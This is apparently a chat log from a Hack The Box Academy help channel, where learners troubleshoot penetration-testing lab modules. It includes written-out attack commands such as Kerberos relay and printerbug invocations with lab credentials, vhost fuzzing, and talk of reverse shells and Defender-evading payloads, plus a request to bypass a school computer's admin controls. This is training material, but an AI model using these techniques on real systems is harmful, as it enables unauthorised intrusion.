then i connect via rdp, but what da hell i need to answer on this question?
0? 1? 0x0?
the "value name" it is looking for is the text after the /v parameter in your command
Hi I'm stuck at Attacking DNS from the Attacking Common Services module, i have found all the subdomains (i think), but the thing is i cannot find the flag in the dns record.
thx
because your computer does not know to redirect "something.academy.htb" to the assigned ip
relies on host headers to serve the appropriate vhost
if you had every possible subdomain also in your hosts file you could fuzz like that, but you don't
but the nice thing about vhosts is that you can just fuzz the ip and tell it in the host header which subdomain you "wanted to visit" and the server will respond accordingly
every possible vhost*
a bit misleading
from evil-winrm why can't i run diskshadow.exe
because the server doesn't have psychic abilities
academy.htb is not a "real" address, your dns does not know what ip stands behind academy.htb and that's why you have to map it manually in your /etc/hosts file
and since it doesn't know that academy.htb maps to ip 1.2.3.4, it also doesn't know where subdomain.academy.htb maps to
It wont let me type in the other chats but does anyone know if there is a tool that can get the json format of a file or whatever else instead of me having to do it manually?
There certainly should be a better substitute
but you know/assume that all the subdomains are hosted on the same server/ip, so what you can do is you fuzz the same ip and in the host header you "fake" which subdomain you browsed. The webserver is set up to check the host header to know which page to serve you
Yh that's a good idea
Hello can someone help out with "Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system." in WinPrivEsc module? Honestly doing it and for the first time I'm stuck for like couple of hours now. The passwords I was able to obtain are
W1ck3d_g00d_Db_P@ss!
5erv3rAdmin!
l#-x9r11_2_GL!
Str0ng3ncryptedP@ss!
none of them are bob_adm
When trying to use the dirkjanm tools I get a ModuleNotFoundError: No module named 'lib.utils'. Does anyone know how to fix this error?
it is
Make sure you're running the script from the directory where the lib directory is located. You can do this by navigating to that directory in your terminal or command prompt before running the script.
You can add the lib directory to your Python path using the sys.path.insert() method. Add the following code to the top of your script:
import sys
sys.path.insert(0, '/path/to/lib/directory')
Replace '/path/to/lib/directory' with the actual path to the lib directory.
the browser only responds once you put the url you found also in your /etc/hosts file
can someone help me bypass my admin on my school computer because i can't download a virtualbox
Thank you for the suggestion. I just had an error cloning the git repository
I get it, better knowledge about dns.
Anybody?
Maybe don’t use a school computer?
when the uid is 1000, on a docker container, how do we escape it? there was a machine i did, but i don't remember the technique
have you tried everything shown?
Yes
its a pretty big part of that section
even sticky?
Nothing there
yes there is
Ok let me look again
You are right...I was in a tunnel vision. Thanks!!
Can't find
we cant remember what you seen before 😂
theres a lot of methods
probably a uid mapping exploit
Ik, there is a directory with 1000 1000 and I remember this method
I don't know the name, I know you obtain a shell as the user with this uid
i dont have other pc
hi! i have a problem with the question "Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer." in Windows Fundamentals, i tried using the command {$_.Status -eq "Running"} | select -First 2 |fl but it showed me a bunch of random processes and none of them are working.
the trick here is to focus on service names not the display name
Oooh okay
i got it thanks
awesome
I am working on the Kerberos Attacks Unconstrained Delegation - Users module and I'm having trouble figuring out what I'm doing wrong. I keep getting a Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' error on the krbrelayx.py side and a DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied error on the printerbug.py side. Can anyone tell me what I am missing please?
Hi, I'm stuck on 2nd flag in Windows Lateral Movement Skills assessment. Can anyone give some hint?
Have you found the file? It's just basic enum here
What kind of file do you mean? Notes.txt or rather some ssh key?
Then you found it .... Just basic enum now
Hi, I am trying to execute SharpHound by evil-winrm connection, but it is not starting... do you know what is the reason?
Evil-WinRM PS C:\Users\tmp> Invoke-Binary SharpHound.exe -c all
Wym
No output at all or failing?
ERROR(S):
Option 'c, collectionmethods' has no value.
Invoke Binary has a weird syntax for passing arguments
you have to either do Invoke-Binary SharpHound.exe -c,all or Invoke-Binary SharpHound.exe "-c, all" or something
if you call Invoke-Binary without any arguments it tells you the format
Evil-WinRM PS C:\users\tmp> .\SharpHound.exe -c all
worked, thanks!
these don't work, but thanks! Invoke-Binary SharpHound.exe -c,all or Invoke-Binary SharpHound.exe "-c, all"
Invoke-Binary loads the file from your hard drive, not from the drive where you are connected, it is used to execute a binary without dropping it on disk of the target machine (to avoid AV detection)
if you are able to drop the file on the machine then yea, your syntax with .\ works fine
I'm doing Active directory Enumeration and attacks, and I have spawned the machine and the target machine. I don't have network connectivity on target machine. Is this expected? I can't clone the kerbrute.git
Does anyone have a suggestion for me?
Download on your kali machine and transfer it
Thanks!
And for the nmap scan sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum what is the hosts.txt? Is it the result of the fping scan fping -asgq 172.16.5.0/23
Well you want to scan the hosts that are up
does HttpOnly protect against stored XSS or not? or with stored, can you make any request you want?
only prevents xss from stealing cookies
why are you scanning the 172 range?
the external range is gonna be the 10.129.x.x; then once you get a foothold you'd scan for internal/use a pivoting tool
i suggest also doing the AEN module blind, without reading the material in the module, and referring to it when you're stuck -- this is the closest you'll get to a mock exam
and treating it as one is beneficial for developing a methodology
ok, got it. I'm confused how this is laid out. It makes sense now
spawn the target, give it as much time as you can, then don't even look at the questions
just go find your way to Domain Admin
as the questions can be leading you on to the path
yea, but I don't need to practice to get to domain admin
again it's about helping hone your methodology
the entire module itself is a walkthrough of it
you shouldn't need it to get to DA
after domain compromise then answer the questions
that way you're not relying on the questions to nudge you onto potentially the right path
I'm not relying on question but in order practice AD part, I need to follow through module right? Isn't that the right way?
nope
ok
everything you need to know to move forward is taught to you by the modules preceding it, if doing the CPTS path
everything from service enumeration, to credential harvesting
most of what you learned to do would have been in the AD Enum & Attacks module; and Windows Privesc module
I'm not doing CPTS Path. I need to get understanding of AD enumeration and attacks. just this module
have you done the prerequisite modules?
there should be a list of modules you should complete before doing the AD Enum & Attacks module
Oh wait
misread
you're on the AD Enum module
my bad
then yeah, read the module
i'm sorry lol
i'm so used to people wanting the hints and stuff for AEN that i misread it
sure, Thanks
also kerbrute should already be installed on the internal parrot host
you shouldn't have to clone it
or do anything
I'll check prerequisite modules
I think Calc was going off the same assumption i was on AEN based on my messages
ok, np
I'll try and read through everything. I didn't find kerbrute but might have missed it
it'll help with understanding the enumeration and attacks
ok, I'll check
since some topics they expect you to know
Could you please share the modules if you don't mind?
you can find it on this page: https://academy.hackthebox.com/module/details/143
I am working on the Kerberos Attacks Unconstrained Delegation - Users module and I'm having trouble figuring out what I'm doing wrong. I keep getting a Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' error on the krbrelayx.py side and a DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied error on the printerbug.py side. Can anyone tell me what I am missing please?
looks like a permission error
Hello, I'm trying to get through page 3 of Introduction to Windows Evasion Techniques Static Analysis -- I have never coded in C# before, I have gen'd my shellcode to add to the given shell injector code....it appears I have to set up VSCode in Parrot, then xfer the payload to the victim...sadly I don't know how to compile nor execute...probably really simple stuff...I'm under a tight deadline to solve for this as I need an obfuscated payload to bypass MS Defender by next week....advice
seems like I need to go through the Introduction to C# course work first facePalm
I entered the commands ||python3 ~/AD/krbrelayx/addspn.py -u inlanefreight.local\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local||, ||iconv -f ASCII -t UTF-16LE <(printf "jasmine") | openssl dgst -md4||, ||sudo python3 ~/AD/krbrelayx/krbrelayx.py -hashes :1d1998b165c6f302bd1d6f89ecce153d||, ||python3 ~/AD/krbrelayx/printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local||, and ||python3 ~/AD/dementor.py -u carole.rose -p jasmine -d inlanefreight.local roguecomputer.inlanefreight.local dc01.inlanefreight.local||. Are you able to give me a hint what I'm doing wrong?
I also tried it with callum.dixon
That course provides you with a DEV machine. Refer back to the Introduction section to access it for every section. Basically you will need the Introduction section open and another tab open with the section you are working through. Work through the section with the DEV machine, then transfer the products you create to your VM, terminate the DEV machine, spin up the TARGET machine from your current section, and finally upload the products to see if you get the flag.
Or you can just use your own setup to create payloads and whatnot.
Don't think it's needed.
The module pretty much gives you the instructions to compile it and the steps to generate the code
Someone put nuts on my cheese nuts sandwich
Anyone recently did active directory attack - skill assessment 2?
ask the question
Question 4, no idea what to do
its something you can do with a list of users
Thank you
Ik you have to password spray something but I tried different wordlists with kerbrute and it didn't give any results. Also responder is just giving me DC names, smb gives me one line of text where it's telling me the username and password of the last two questions
try the passwords used in the section
Targeting smb?
the password spray section
But how do I create the users list?
Like the tools that are in that section are either giving me errors or no output or one line
they show two ways to password spray
they show how
You're talking about password spraying making a target list right?
hey do modules stay owned forever? like if i unlock every tier 1 and 2 module with my student subscription and then cancel it will i still be able to access them?
yeah i still got the whole path after my sub ended
As I understand it, if you buy it with cubes it's yours. If you finish a module while subbed it's yours forever including updates.
oh cool
If the tools covered aren't working, try powerview.
Just to be clear , I have to use the tools on ms01 right?
Because I tried everything from the module for making a target list
Nothing works of what's there
I got one username with kerbrute on DC01 but it's not the answer for question 4
I need help understand the module content to follow along
For this module section https://academy.hackthebox.com/module/143/section/1265-
When I spawn a machine it's a Kali machine and the other machine which I start is my target machine.
What should I do? Should I setup pivoting to access 172.x.x.x address and do my enumeration and follow along?
you only keep modules you 100% completed
shit
you do what the module discusses
only if its a windows tool
i just got the user using kerbrute
ok module suggest to run this command
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
When i run kerbrute I get error
It tells you to ssh and run the commands on there
if you want to start a pivot, then do that if you want
How did you get the user with kerbrute if port 88 is closed on ms01?
kerbrute is used against the domain controller
Yes but that user isn't right
I found it too but it said it's wrong
wdym?
And where does it say to run it against the domain controller and not ms01?
that's how kerberos authentication works
you could even copy the kerbrute command and just switch the user list and IP
even if you didnt know how it worked
I am working on the Footprinting/DNS Recon module and on the last problem looking for the host with IP ending in .203. I am using dnsenum with Seclists. I've run multiple lists and not getting it. Is there something I am missing or simply just keep running all the Seclists?
Dude I found a user on domain controller with kerbrute it's telling it's wrong
List jjsmith.txt
User starts with a
bro
you dont need to user enum if you already have a valid user
you can make a list of all the domain users with the creds you have
then password spray
Then why is it saying it's wrong on question 4?
Does the user start with a?
Yea
looks deeper on the sub domains you already have
dm me what ur running
I see "internal" but I cannot run dnsenum against it. Is that the right direction?
try dev
Ah ok I see what's happening
hi
I am having trouble connecting to the target host from my own machine via VPN:
┌─[✗]─[greg@parrot]─[~]
└──╼ $sudo ssh david@inlanefreight.htb@10.129.154.29 -p 2222
[sudo] password for greg:
ssh: connect to host 10.129.154.29 port 2222: Connection refused
nevermind fixed
I'm having trouble with cracking this file. I know I'm not supposed to FTP in and get the file but how do I pass in this ticket from linux:
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_91JyEJ
Default principal: svc_workstations@INLANEFREIGHT.HTB
Valid starting Expires Service principal
12/06/2024 02:08:32 12/06/2024 12:08:32 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 12/07/2024 02:08:32
this is for question 5 of pass the ticket from linux section of password attacks module
idk
the section should explain what to do
ok I will just reread tomorrow then
I think I just need to let my brain marinate and reread the section
first five questions were easy so I'm sure question 6 is too if I do that
covered under password attacks module i believe
ya
I'm gonna reread section tomorrow
I'm probably missing something
Can anyone give me a hint or point me in the right direction , ad enum and attacks skill assessment 1 question, Connect to the admin on ms01 and get the flag
did you connect to ms01?
I only have a nc session on a windows target and rdp isn't open on the target, and i have the SharpHound zipfile, but can't transfer it to the linux attack host to see the output.
crackmapexec?
I'll try that, using the Windows box as a pivot and proxychains crackmapexec
I am still stuck working on the Kerberos Attacks Unconstrained Delegation - Users module and I'm having trouble figuring out what I'm doing wrong. I keep getting a Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' error on the krbrelayx.py side and a DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied error on the printerbug.py side. Can anyone tell me what I am missing please? It was suggested that there is some type of permission error. Do I need to configure something on Windows to allow RPC?
access denied sounds like wrong credentials to me
Have you figured out yet?
Don't include the port in the payload.
What have you tried so far?
what have you tried so far?
What payload did you use?
I wound up figuring it out, thanks for replying
The exercise provides the credentials
I can generate a hash. It provides the passwords
||iconv -f ASCII -t UTF-16LE <(printf "C@lluMDIXON") | openssl dgst -md4||
did you craft the SPN?
Yes. For CIFS
as long as spn is correct, and the syntax of the commands are correct, it should just work. that error code specifically indicates a problem with permissions or maybe the spn
so i guess double check your target/creds/etc in the syntax
careful not to spoil stuff
Okay
but yeah you're not using the right creds
I'm still getting the same error with carole.rose
i would make sure all targets/creds are correct and probably restart the target and try again
Was on Reddit looking up how to become a hacker now im here (???)
awesome
Can we reset path progress?
we cannot
But you can use /feedback to let HTB know you want a feature like that
hello, good day guys
hello i need help with Attacking Thick Client Applications
i've been stuck two days on this one, please help
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
i tried many times to capture the files
@kind harbor
@fathom pendant
What? I was pointing you to a resource
?
just ask your question
Stuck on the RDP-access-to-Web01 question in Windows Privesc § Further Credential Theft (67 § 638). Tried LaZagne — no dice. Mimikatz — still nothing. SessionGopher — nothing again. Registry keys where creds are typically stored — again, nothing. So what else is there?
Doesn't help that every single graphical enumeration attempt is being interrupted by the periodically-flickering-desktop issue that @blissful verge needs to be made aware of (see post in #1234357888114364508 about WINLPE-SRV01)
Even managed to spawn a reverse shell on the box as TrustedInstaller (!) to no avail with credentials.
How to hack
I am trying to find the solution of this question , Perform an analysis of C:\Apps\Restart-OracleService.exe and identify the credentials hidden within its source code. Submit the answer using the format username:password. but i do not know what i got wrong
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Cmdkey, meanwhile, is only returning one entry: the administrator. Not a word about WEB01 either.
Oops, never mind, was trying to RDP as the wrong user
That could be an issue 😅
Even so, the performance of the target SUCKS. Takes a full 10 seconds to respond to a single click.
Try to connect over tcp to the vpn. Sometimes that helps
Or switching regions, maybe they destroyed another cable under the ocean
Not going to matter when it's a US region I'm connected to and I'm in California.
Reach out to support for connection related issues
And this is the biggest problem because it causes the PowerShell window to lose focus halfway through typing a command.
hi man, I'm really stuck with this task. can I DM you?
Since most of the CBBH modules are in the CPTS role path already, you kind of get a 2-for-1 deal if you go for the CPTS first. Still have 2 modules to go though…
But anyhow, finally moved on now that I read the fine print about who to connect as for each of the other flags.
Is this where we can ask a question about a module question?
@rose sage you came to the right place
Information Security Introduction to Windows Command Line. Question: Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.
I am using:
where /R C:/ *.txt
but an error comes back
+ at line: 1 char:1
+ ~~~~~~~~~~~~~~~
but i try it on another local machine and it works. Am i doing something wrong?
i have also tried to use find command with similar results.
have you tried C:\ with a backslash?
oh sorry.... yes i just put it backward on this text. I did use \
where /R C:\ waldo.txt
find "waldo" *.txt
i have tried them all
the only one i have not tried is findstr
okay give me a sec
I didn't do that module yet but I will try that section
Actually, reading the section
you seem to be using powershell
and the section is using cmd instead of powershell
yes thats the one
so you need to get into commandline
enter the cmd command, that should resolve your issue
I think servers are slow i had to reconnect but having issues now.
Try to switch regions, that might help. If not, best to contact support
but the only issue here is being logged into the powershell and not having started the commandline 🙂
ok let me work with this and see what i can do. thanks
When connected, just enter cmd and press enter that will get you into commandline
you were absolutely correct. Did not notice that when i was in there. 🤦♂️ Thank you for the help.
wazzup???
hey i am stuck at this question: What command language interpreter is used to establish a system shell session with the target? I think the answer to this is meterpreter
module shell & payload in automating payload delivery
you're welcome. let me know if you did it :d
@storm elk just did. Commands work fine when you are actually using it in cmd and not in PS. Did not see the PS in front when i ssh'd in. 🤦♂️
no worries 😄
I appreciate your assist!
check your browser permissions
???
Isn't it just meterpreter?
Terminal
terminal is a program not a command language interpreter
Console
💀
the answer is powershell but how are we using meterpreter shell
and meterpreter shell uses in-memory dll-injection so how come powershell is the right answer to that question
can anybody explain this to me
what payload did you use ?
default payload which is a meterpreter shell
are u talking about exploit
its windows/smb/psexec
so in meterpreter when you type shell you get dropped into a PS shell, right ?
no cmd
but the que is What command language interpreter is used to establish a system shell session with the target?
interesting. What's the module and section ?
nevermind
.
yeah, good question, not sure and not sure how I got it. We do see [*] 10.129.180.71:445 - Selecting PowerShell target in the output but it's the only reference. I would have said we get a powershell from meterpreter but even the content shows cmd
yeah
thats the confusion
chatgpt
```
How PowerShell Comes Into Play
windows/smb/psexec Mechanics:
This exploit uses SMB to remotely execute commands on a target machine.
By default, it creates and executes a service (svcctl) on the target machine to deliver the payload.
The payload might use PowerShell as the interpreter to execute commands or load the Meterpreter stager into memory.
PowerShell's Role:
When targeting a modern Windows system, PowerShell is often used by Metasploit as the native command-line interpreter to run the payload (especially in post-2012 Windows systems where PowerShell is default).
The payload may leverage PowerShell to:
Execute the initial stager.
Inject Meterpreter or other payloads into memory.
Why PowerShell is the Right Answer
PowerShell is the underlying interpreter used to bootstrap and execute the Metasploit payload when leveraging windows/smb/psexec. While Meterpreter is the final shell you see, the actual execution of the stager is mediated by PowerShell on modern Windows systems.
```
please do not feed AI HTB content above Tier 0, as AI trains off of the data you give it
I’m pretty sure it just means powershell was the one that executed the meterpreter session
Powershell can still open cmd and and vice versa
yes, the docs say as much. I'm not sure this is what the question means to ask though, especially since the content doesn't mention specifying the delivery method
yeah i will not do that again
the doc I was referring to: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md#:~:text=is explained below.-,Powershell,-Target
yeah this part
```
Automatic Target
There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the native upload. Each target is explained below.
Powershell Target
The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
```
Yeah I think it was talking about that tho
going off what the hint says
in conclusion powershell is being used to spawn the meterpreter shell
Yes
that probably explains how I got it 🙂 yeah you're definitely right
Can I run bloodhound.py over a pivot? I keep getting connection refused
yes, you can use the python version of bloodhound to collect data of the domain
try using tcp when starting a collection
Got dns.resolver.LifetimeTimeout: The resolution lifetime expired after 3.104 seconds: Server Do53:DC_IP@53 answered The DNS operation timed out
even with tcp
also increased the timeout but still
Hello
who could help me on ZAP Scanner ?
I've got some issues to find the flag of Using Web Proxies\Web scanner\zap scanner
Did you spider the target?
Yes, I ran a scan, and that's where I'm stuck.
It seems I should be seeing a red vulnerability, but all I have are a bunch of orange ones
Ok, well what did the section mention about next steps after spidering? I'd review that, but it should be something related to the site tree after identifying the various site pages.
If you are still not understanding after checking that part out again, let me know and I will explain that section a bit more.
I can't get back to it right now, but I'll check it later and get back to you.
Hello. A very disturbing problem is annoying me. In the Information Gathering - Web Edition module, the submodule Virtual Hosts. Tomorrow I did all the questions except the first two due to proper wordlists, but now the main issue is the DNS resolution of inlanefreight.htb:PORT. I refreshed the academy site, changed from my own VM to PwnBox and added that to my local hosts file (vim /etc/hosts) and referred to my previous commands which WORKED, and copied the hostname excluding the port as it's not static. I know the question is big, but after doing everything I can, I still can't resolve the IP to host locally. (I can access it with IP:PORT in web and in my fuzzer)
can someone point out where I am doing wrong?
don't include the port in the hosts file
also if anyone can provide me a proper wordlist that can assist me in solving the first 2 questions (if it's against the ethics of the module, no need)
I thought I would enable my persistence and ask the group again if someone could help me finding the API with module/144/section/1311 Question 3 - What is the API key in the hidden admin directory that you have discovered on the target system? I add the ip and inlanefreight.htb to the /etc/hosts file, I can ping it after, but if I goto the website it will not load. I cannot do a whois, or a dig, or a dnsenum. It's like I am missing something. I spent 6 hours the other day and thought I would re-visit this morning. Same results. If anyone has experience with this one please message me. Thanks ❤️
Have you tried fuzzing it with something? dirb, gobuster, ffuf, etc? Is this the skills assessment?
don't forget to include the port as the application is not running on default ports such as 80 and 443
been there, tried that, just tried again with dirb inlanefreight:port # no bueno, same with the whois 😢
If you are trying question one, read it again.
true, you see that in the screenshot because I already tried without the www, and http is a must so again I am lost.
The IANA ID? got it This is Question 3: What is the API key in the hidden admin directory that you have discovered on the target system?
module/144/section/1311
Ok then I would move past whois. I mean not wrong in checking from a methodology POV by checking everything, but in the end you are trying to identify directories, so I would focus on that. Also, in the summary of the skills assessment they provide a solid hint on things to look at, I would def check those. But maybe start looking at the active enumeration stuff and then progressing.
To complete the skills assessment, answer the questions below. You will need to apply a variety of skills learned in this module, including:
Using whois
Analysing robots.txt
Performing subdomain bruteforcing
Crawling and analysing results
That is accurate
@gray yacht I can't use the whois, I can't get the robots.txt because the site won't load, dnsenum gives network errors. Gaaaaaaah
Didn't they give you a vhost?
I don't think I understand what exactly you are trying to ask, I am still a bit of a novice. Could you explain a bit more and I can answer?
btw I appreciate your time, I don't expect a miracle, I am just hoping someone who has been here already might know where I am going wrong.
There should be a section in that module called "Virtual Hosts". Review it as it should tell you what you can do with a vhost.
ahh yes, I tried this yesterday with gobuster
Today is a new day.
You can DM your command and I'll look at it, odds are you just need to work through some wordlists.
@gray yacht gobuster vhost -u http://94.237.59.180:12345 -w usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain ITS ALIVE just not the right wordlist, ok this is progress, thank you, I have something to play with now 🙂
That's a great start. If you don't get anything, just progress through those wordlists to verify that there truly aren't any hits, because you won't know unless you try.
Thanks again for your help! and patience 🙂
Hello there, can anyone point me to the right direction?
I'm currently working on the module : "Windows Attacks & Defense" section : "Print Spooler & NTLM Relaying"
I'm asked to configure NTLMRelayx to forward any connections to DC2 and attempt to perform the DCSync attack. When I do so with the same command shown in the module I get a bunch of errors like "OSError: [Errno98] Address already in use", but at the end it says "Servers Starded, waiting for connections" as it should.
Then I switch to the kali machine and start the dementor.py as shown in the module, this one completes with no errors but when I switch back to the terminal where I setup the relay I cannot see anything happened.
I noticed that the relay terminal picked up some connections randomly even before I started dementor.py.
Anyways the second question asks me to connect to a server > implement a fix for this bug > check the message error, so I tried to connect to said server and the fix was already there.
Is it possible I'm stuck due to the HTB VM not "resetting" properly? Feels like I ended up in an already completed machine..
i'm having the same issue, i have already tried a fresh install of impacket in a venv and ||converted the password to NTLM hash|| . can anyone offer some advice?
Read the questions u have to use whois on inlanefreight.com not inlanefreight.htb i got stuck there for a little while
You need a domain to append
It is the right wordlist try -t 200 😉
And this
I wouldn't recommend adjusting the threads
I wasn't getting the result, I did this and it worked. I redid the module yesterday cuz of the new questions 🤷♂️
In a rl engagement you'd typically be forced to use way less threads and requests than default
So you don't accidentally DOS something
Up to him i guess thats 100% the right wordlist for all questions tho
Yeah
Any help on Intro to Assembly Language / Task 1 please? I got the shellcode by decoding with the rbx value in that program, but if I execute that shellcode it's not working. Then I tried to fetch the assembly instructions of that shellcode and changed the register size according to the value, but I still get a Segmentation fault error if I execute that binary file after it got assembled.
Verify
Read and follow #welcome
If only there were channels people should read to figure out how to navigate the server
how can i find my Account Identifier ?
got it sorry
How can I listen with responder over a ligolo pivot?
@fathom pendant && @teal sparrow I think the wordlist is off. I also tried ffuf but nothing.
@fathom pendant && @teal sparrow ffuf -u http://94.237.59.180:12345 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:subdomain -H "Host: FUZZ.inlanefreight.com" -fs <---- nada 😦
I also gave the -t 200 faster, same results.
present your question and command to deepai.org and see if it gives you a different way of doing it, or copy your line and ask it to modify it to use another program listed in the module. Something I learned that works sometimes, but I have not done this module yet.
I believe it's a different command to give the domain in the gobuster command
Flag* not command
Like --domain
I don't use gobuster much
I'm not sure if you can. If it works at all you'd have to setup listeners in ligolo to direct the traffic from your target to your attack box
In newer versions of Gobuster, the --append-domain flag is required to append the base domain to each word in the wordlist when performing virtual host discovery. This flag ensures that Gobuster correctly constructs the full virtual hostnames, which is essential for the accurate enumeration of potential subdomains. In older versions of Gobuster, this functionality was handled differently, and the --append-domain flag was not necessary. Users of older versions might not find this flag available or needed, as the tool appended the base domain by default or employed a different mechanism for virtual host generation. <--- from the module, so I used: gobuster vhost -u http://94.237.54.240:39191 -w '/usr/share/seclists/Discovery/DNS/namelist.txt' --append-domain inlanefreight.htb (with and without -t 200) and it's very much functional, but the wordlist is incorrect it seems.
¯\_(ツ)_/¯
Also your ffuf command you shared was inlanefreight.com , not inlanefreight.htb
I am running namelist.txt but I also tried subdomains_5000, 20000, 110000, nada. But I have a heartbeat at least with gobuster
ooooo!
thanks for noticing the details, I should try again 🙂
I used to get paid for details
--append-domain does not accept a value, it extracts the domain from the -u parameter and there you have the IP address instead of the domain
Hi, has anyone done the Pivoting, Tunneling, and Port Forwarding I am having some odd issue that I want to cross check!
@bright coral this is who advised me to amend the domain, so that's what I did. It's a bit confusing, but that's ok. I opened another terminal to try without amending it, but I also did that before with no results.
It's confusing after while. I had 6 hours yesterday and another 3 or so this morning now.
You add the IP and domain to your hosts file, then you use gobuster vhost -u http://<domain>:<port> -w <wordlist> --append-domain
OR
You use gobuster vhost -u http://<ip>:<port> -w <wordlist> --append-domain --domain <domain>
Use subdomains list 110000 instead of 5000, that's what I did. Make sure your hosts file is set up correctly; you also need to use the port in your command
thanks! I will try this and get back to you. I did not see that command in the module or --help menu, and I think when I tried man gobuster there is nothing, so if this works I'll let you know, and add the 110000 @teal sparrow 😉
Hello
Hallelujah!
Guys, for some reason with my msfvenom payload I keep getting a segmentation error whenever I run it, not sure what might be causing it. I have tried a bunch of different payloads like x86, x64 and meterpreter_reverse_tcp but it's usually the same thing, or just a constant connection to my multi handler that keeps dropping and never actually establishes a connection
when you execute the msfvenom payload to get a connection back, do you specify set payload (Payload) on msfconsole, to whatever payload you used for the msfvenom
Hello all. I'm new in here.
Hi
I didn't do that, thanks let me try it out
Oh lol that's probably the issue, because it's set to default reverse tcp, which isn't compatible with most msfvenom payloads.
I am not sure what is going on with this one
Yeah that was it, can't believe I forgot something that basic, thanks man, been thinking what's wrong with my payload the whole day! thanks a lot
I managed to get the TGT by ||adding the --target flag (--target dc01.inlanefreight.local) to the krbrelay command|| but now running into the issue of not being able to DCSync
No problem, the same thing happened to me so that's why i thought you might have had the same problem.
Thank you
Btw @winter schooner did you take the exam or are you preparing?
Im still doing the cpts path
like 50% done
Was gonna ask if you want to be study buddies but you are more than 2x ahead of me
ok, if you need any help though I can assist you, cause I already did those.
Hi guys, on the skills assessment for XSS and could use some hints
svc_inlaneadm
none of the parameters seem to be vulnerable when I test with XSStrike :/
reset target and try again
can I show u the link before I do that?
test manually
its a bit weird
I am trying to find which parameter is vulnerable, to an XSS. It would be a little hard to test each one manually
dm
ty
did you start a php server?
didn't start any server... trying to see which parameter is vulnerable before I move on to testing with exploits
I will tho, once I find out which parameter is vulnerable
Thanks man, can I DM you and add you as a friend on here ?
focus more here /module/103/section/1009
the thing is... once I click "submit". The parameters change
ill have a look
look more into what it says about php and javascript
whats the section name?
oh wait just got it no worries
be sure to follow this too: